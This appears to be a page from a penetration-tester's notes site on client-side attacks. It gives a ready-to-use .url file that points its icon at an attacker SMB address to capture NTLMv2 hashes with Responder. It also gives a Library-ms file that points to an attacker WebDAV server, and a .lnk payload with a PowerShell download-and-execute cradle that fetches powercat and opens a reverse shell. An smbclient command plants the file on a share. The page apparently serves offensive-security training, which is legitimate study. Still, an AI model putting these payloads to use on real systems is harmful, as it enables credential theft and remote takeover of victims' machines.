Client Side Attacks

Use this tool to generate various types of files required for client side attacks.

GitHub - Greenwolf/ntlm_theft: A tool for generating multiple types of NTLMv2 hash theft files by Jacob Wilkin (Greenwolf)GitHub

Malicious Url

.url file to put in shares, upload in file upload, etc.

[InternetShortcut]
URL=whatever
WorkingDirectory=whatever
IconFile=\\192.168.45.236\%USERNAME%.icon
IconIndex=1

Name this starting with @ so that it shows up on top like @evil.url

Listen with responder:

sudo responder -I tun0 -A

Windows Library File

Useful to put in shares or in a folder where it is accessible by file explorer. Name it something like config.Library-ms

<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
<name>@windows.storage.dll,-34582</name>
<version>6</version>
<isLibraryPinned>true</isLibraryPinned>
<iconReference>imageres.dll,-1003</iconReference>
<templateInfo>
<folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType>
</templateInfo>
<searchConnectorDescriptionList>
<searchConnectorDescription>
<isDefaultSaveLocation>true</isDefaultSaveLocation>
<isSupported>false</isSupported>
<simpleLocation>
<url>http://ip-here</url>
</simpleLocation>
</searchConnectorDescription>
</searchConnectorDescriptionList>
</libraryDescription>

We can create a webdav server so that we can access the webdav server upn double clicking the config.Library-ms file:

wsgidav --host=0.0.0.0 --port=80 --auth=anonymous --root /home/kali/webdav/

Now we can create a .lnk file called something like automatic_configuration.lnk in the webdav folder

powershell.exe -c "IEX(New-Object System.Net.WebClient).DownloadString('http://<ip>:<port>/powercat.ps1');
powercat -c <ip> -p <port> -e powershell"

Now we can put the config.Library-ms file in the share:

smbclient //<ip>/share -c 'put config.Library-ms'

PreviousExploitation NextODT Macro (Libreoffice)

Last updated 1 year ago

Was this helpful?